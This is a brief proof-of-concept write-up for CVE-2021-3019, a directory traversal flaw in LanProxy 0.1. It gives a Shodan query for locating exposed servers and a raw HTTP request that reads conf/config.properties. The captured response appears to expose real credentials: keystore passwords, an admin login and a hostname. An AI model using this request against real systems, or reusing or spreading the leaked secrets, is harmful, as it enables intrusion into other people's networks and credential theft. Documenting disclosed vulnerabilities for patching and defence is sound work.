[CVE-2021-3019] LanProxy Directory Traversal
Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports tcp traffic forwarding and supports any tcp upper layer protocol (access to intranet websites, local payment interface debugging, ssh access,
remote desktop, etc.) LanProxy version 0.1 is vulnerable to path traversal vulnerability that may leads to read conf/config.properties to obtain credentials for intranet connection.
Shodan search: "Server: LPS-0.1"
Reading configuration file
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1
server.bind=0.0.0.0
#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900
#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay
#这个配置可以忽略
server.ssl.needsClientAuth=false
#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0
#后台控制面板端口(安全组放行端口)
config.server.port=8090
#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
